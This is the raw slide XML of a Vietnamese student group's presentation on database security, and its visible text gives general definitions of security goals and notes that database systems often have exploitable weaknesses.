          <p:cNvPr id="6" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{315D6960-8955-454D-4680-D7D9959C34CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7733261" y="9650282"/>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19</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F5152FE-5A86-D064-C819-2EF1D0CBECDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3699348" y="4164323"/>
            <a:ext cx="921407" cy="230352"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EFDD39F-B1BF-391A-EEC0-AADD78DEB060}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6701415" y="7578601"/>
            <a:ext cx="687634" cy="275054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A4B9001-F30B-4F10-1D97-4C6290C0DC05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12492615" y="7578600"/>
            <a:ext cx="555787" cy="284543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6610C180-CB96-8FE1-C5D4-4764438E105B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972459" y="8764954"/>
            <a:ext cx="12754563" cy="86177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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="123258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11" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6057217" y="1228725"/>
            <a:ext cx="8115300" cy="2686056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="10400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="10400" u="none">
                <a:solidFill>
                  <a:srgbClr val="9A6547"/>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Danh sách thành viên</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6322F289-5A43-40F4-3ABA-E4C8E6FCE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5" y="0"/>
            <a:ext cx="5059898" cy="1028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11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9A08C7F-94F6-0AC3-8966-9DFC8D2325F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="753031260"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6057216" y="4076699"/>
          <a:ext cx="10935383" cy="52679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Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E0BBB21-F31D-68C3-6B3F-1E4694E8140A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8077200" y="9921875"/>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a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/19</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5144530"/>
            <a:ext cx="12701386" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="10800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9000">
                <a:solidFill>
                  <a:srgbClr val="705E51"/>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Cảm ơn thầy và các bạn đã lắng nghe bài thuyết trình của nhóm 6.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="304800" y="-2068688"/>
            <a:ext cx="17465828" cy="6986331"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6350000" cy="2540000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Freeform 5"/>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062" b="-4062"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1028700" y="5457678"/>
            <a:ext cx="266700" cy="8220221"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="279400" cy="8531991"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="AutoShape 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="-2880818" y="5492423"/>
              <a:ext cx="6041036"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AutoShape 9"/>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id="{467B3D97-0BC9-3AB6-42B5-007634F62ED9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="2324100"/>
            <a:ext cx="16802100" cy="6712434"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71F0E821-4B67-3DC4-47AE-3C2B054BE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38" y="0"/>
            <a:ext cx="9921961" cy="47931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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2052" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41AA71BB-BDCB-6D1A-4D6E-D1E04D56B54A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2093805882"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1254026" y="5047342"/>
          <a:ext cx="15590098" cy="36688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12FB7D77-AAD9-C0F8-5D6B-4733E024F060}"/>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1" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7EC53F1-D025-D3B1-74A9-64EB96B92CD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8001000" y="9891772"/>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3</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40029475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324100"/>
            <a:ext cx="16802100" cy="6712434"/>
            <a:chOff x="0" y="49134"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="49134"/>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1987197" cy="1511364"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="254000" tIns="254000" rIns="254000" bIns="254000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="457200" indent="-457200" algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Trong quá trình phát triển phần mềm, bảo mật thường được coi là một yếu tố phụ và ít khi được ưu tiên hàng đầu</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>. </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3600">
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="457200" indent="-457200" algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Tuy </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>nhiên, việc xử lý lỗ hổng bảo mật mà không có kế hoạch </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>cụ thể</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3600">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="457200" indent="-457200" algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3600" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>L</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>ỗ hổng bảo mật có thể phụ thuộc vào cách mà hệ thống được triển khai</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>. </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="+mj-lt"/>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9" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="808910"/>
            <a:ext cx="15544799" cy="78867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 Giới thiệu về cách tiếp cận bảo mật cơ sở dữ liệu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E3E3EC2-8CA6-4298-5DAB-9A66446C16D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11550625" y="1597587"/>
            <a:ext cx="6737375" cy="6737347"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6350000" cy="6349974"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Freeform 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DA84286-A2E0-E852-62DB-F567418A461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rimson Pro" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{743B8180-4FA5-96D7-6D55-99E58E266C9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7467600" y="8641547"/>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4</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/19</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D9F0-5190-B337-7614-7159E0C22B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2120E1-6349-7BB6-B88A-C26BA8863D0B}"/>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032DCE1D-D5FA-D169-51BE-72B3E723091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CEB5D926-B3F4-E59B-A547-6D06FC315D41}"/>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03E7B162-095C-CB4D-04A7-F9BB91FD8AE1}"/>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1ADD7DFA-3EDE-E7F4-E401-EF52FADD973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2.1 Bảo mật</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a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="32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4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="TextBox 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D2A80CE-B053-D19C-EB1A-846560B6C626}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3463694"/>
            <a:ext cx="13064159" cy="5139869"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Khái niệm: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Bảo mật là quá trình hoặc tập hợp các biện pháp được thiết kế để bảo vệ thông tin quan trọng, hệ thống máy tính, dữ liệu, tài nguyên và các hoạt động trực tuyến khỏi các mối đe dọa, nguy cơ và rủi ro. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pP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vi-VN" sz="2800">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Mục tiêu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="1" u="sng">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>đảm bảo tính toàn vẹn, sẵn sàng và bảo mật của thông tin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" u="sng">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="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Đồng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>thời ngăn chặn các cuộc tấn công, truy cập trái phép và sử dụng sai mục đích. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-4572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xem xét</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mật</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dữ liệu</a:t>
            </a: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nó đòi hỏi một cách tiếp cận có hệ thống phải bao gồm: nhân viên, bảo mật vật lý và kỹ thuật, an ninh mạng (LAN và / hoặc WAN)</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indent="-4572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Đây là một cách tiếp cận rất chung về bảo mật, vì hầu hết mọi người đều xử lý các vấn đề bảo mật liên quan đến cấu hình tường lửa. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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 nhiên, để bảo vệ dữ liệu và tránh các: mối nguy vật lý, lỗi phần cứng, lỗi phần mềm,… Mọi công ty đều phải có chính sách bảo mật dữ liệu. </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83F824C0-316B-666E-9A51-67ACA35CD1C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="1616801">
            <a:off x="14945504" y="2056594"/>
            <a:ext cx="2860223" cy="3271303"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6350000" cy="6349975"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F897986-A056-9F93-7437-8A32F20D084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9999"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CDEF421-7C55-FC61-7C43-1DD23FC49658}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7783011" y="9105505"/>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5</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Freeform 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97219A98-475B-0404-6F11-B6A08886E403}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="13223110">
            <a:off x="14138621" y="6784915"/>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n-US"/>
              <a:t>l</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34700628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13AE-2504-DD2E-BCA7-64B398446A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E98774-BC3C-B866-F631-F022F1295D00}"/>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252C8B3E-7EA8-C366-6BB6-8DA5C54730DE}"/>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EB3D5EE4-23FD-E3A2-1910-0720F5AF7455}"/>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FD8BBF3D-04E5-B6A3-3E14-AA47E7BC4BF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30DBEA8F-74ED-0927-D140-75867E125AE4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="122394" y="246016"/>
              <a:ext cx="1806232" cy="269547"/>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2 Các lỗ hổng từ nhiều nguyên nhân khác nhau</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="32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4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="TextBox 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7741500C-4F4C-D8D2-344E-87913951715B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3463694"/>
            <a:ext cx="12344400" cy="3693319"/>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en-US" sz="3200" kern="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>H</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ầu hết các hệ thống cơ sở dữ liệu thông thường đều có rò rỉ mà kẻ tấn công có thể sử dụng để xâm nhập cơ sở dữ liệu.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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3200" kern="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
